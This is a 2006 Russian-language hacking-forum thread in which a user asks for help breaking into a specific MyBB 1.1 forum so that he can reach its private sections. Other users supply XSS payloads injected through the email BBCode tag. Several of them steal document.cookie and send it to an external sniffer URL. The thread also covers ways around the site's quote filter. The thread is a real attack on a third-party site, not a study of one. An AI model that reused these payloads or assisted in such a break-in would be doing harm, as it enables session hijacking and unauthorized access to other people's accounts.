Уязвимость движка MyBB

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Уязвимость движка MyBB

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость движка MyBB

03.07.2006, 01:14

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

С нами: 10819920

Репутация: 83

Уязвимость движка MyBB

Всем привет, парни нужна помощ, такая ситуация, есть один форум, который имеет приватные разделы, переюзал множество сплоитов, в версии форума еще не уверен, в админке пишет MyBB 1.1, может ктонить чтонить посоветует, может инъекции есть? Ну вовсем кидайте сюда все, буду очень признателен. Если есть такие кто может помоч мне в деле, то стукните в асю (858476) там и спишемся.

𝕏 Twitter Reddit Telegram Копировать ссылку

03.07.2006, 01:23

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

С нами: 11200586

Репутация: 1398

Возможно админ умный и прикрыл все дыры. Вот и сплойты не работают, а может руки такие.

__________________
-=Ok let's Go=-
-=OpenVPN=-

03.07.2006, 01:28

Hao Asakura

Новичок

Регистрация: 23.06.2006

Сообщений: 14

С нами: 10464727

Репутация: 0

Если это на рухелпе то там дырки закрыты.
По крайней мере на ipb 1.3 final сплойт не сработал.

03.07.2006, 02:02

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

С нами: 10819920

Репутация: 83

Парни, ну не эжто мы так просто сдадимся??? Ведь не уязвимых движков не существует. Форум американских юзеров. Поэтому врядли что либо они делали, вндь юзер по безопасности поставил бы аундификацую на админку, а там так просто все стоит, да и юзеров зарегино не много, кинтьсе линк на рабочии сплоиты (а то обычно с ошибками пишутся) буду очень признателен. Боюсь оставить линк жертвы, если кто может посмотреть, то кину в пм.

03.07.2006, 02:23

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

С нами: 10819920

Репутация: 83

О да, парни я это сделал, хсс прокатило, вот сам код есди кому интересно
[*code][*email=a"onmousemove="*alert(document.cookie);"mai l@mail.ru]Нажми сюда![*/email][*/code]
(Без *)

03.07.2006, 02:41

Hao Asakura

Новичок

Регистрация: 23.06.2006

Сообщений: 14

С нами: 10464727

Репутация: 0

Неуязвимых движков нет.

Ты линк дай на форум.

03.07.2006, 03:38

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

С нами: 10819920

Репутация: 83

Цитата:

Сообщение от Hao Asakura

Неуязвимых движков нет.

Ты линк дай на форум.

Линк я тебе отправил в ПМ
----------------------------------------------------------------------
Люди теперь я сдаюсь, сплоит

Код:

[*code][*email=a"onmousemove="alert(document.cookie);"mail@mail.ru]Нажми сюда![*/email][*/code]

работает (естественно без звездочек) а вот под сниффер чтоб работал мозгов не хватает, нужна срочно помощь (плизззз)

Последний раз редактировалось Romaxa55; 03.07.2006 в 03:44..

03.07.2006, 04:03

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

С нами: 10489346

Репутация: 1403

Код:

[*code][*email=a"onmousemove="img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]Нажми сюда![*/email][*/code]

Поробуй так ))) Если у тебя код рабочий )))

Последний раз редактировалось Azazel; 03.07.2006 в 18:14..

03.07.2006, 05:20

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

С нами: 10819920

Репутация: 83

Пробовал, там еще нужно <script> закодировать, но на ковычки фильтр стоит, вот думаю как их обнануть
Сплоит

Код:

[*code][*email=a"onmousemove="<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>;"mail@mail.ru]sex[*/email][*/code]

Исходник.

Код:

"><a href="mailto:a"onmousemove="&lt;script&gt;img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;&lt;/script&gt;;"mail@mail.ru">sex</a></div><br />

Как вижу фильтр стоит на ковычки <> вот терь такой вопрос, как можно обойти фильтр на ковычки?

Последний раз редактировалось Azazel; 03.07.2006 в 18:13..

#10

03.07.2006, 07:52

Cheburek

Новичок

Регистрация: 22.05.2006

Сообщений: 18

С нами: 10511461

Репутация: 0

для активного хавтило бы только этого

Код:

[*code][*email=a"onmouseover=document.body.background="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]sex[*/email][*/code]

будет работать только в ie(хотя х/з) ... как впрочьем и вариант с img...
но здесь можно при желании по-моему и пасивное XSS сделать что-нибуть типо:

Код:

[*code][*email=a"style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`mail@mail.ru]sex[*/email][*/code]

Последний раз редактировалось Azazel; 03.07.2006 в 18:16..

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подборка уязвимостей phpBB	-=ka$at1k=-	Уязвимости CMS / форумов	3	02.07.2006 15:26
Свеженькая XSS уязвимость в форуме mybb 1.10	Vantuz86	Уязвимости CMS / форумов	0	11.04.2006 22:58
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ?	bike	Уязвимости CMS / форумов	2	24.12.2005 17:28
Заключение MyBB	KEZ	Уязвимости	4	31.03.2005 12:51
Уязвимость в iChat'е.	-SX-	Болталка	0	15.01.2005 23:46

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules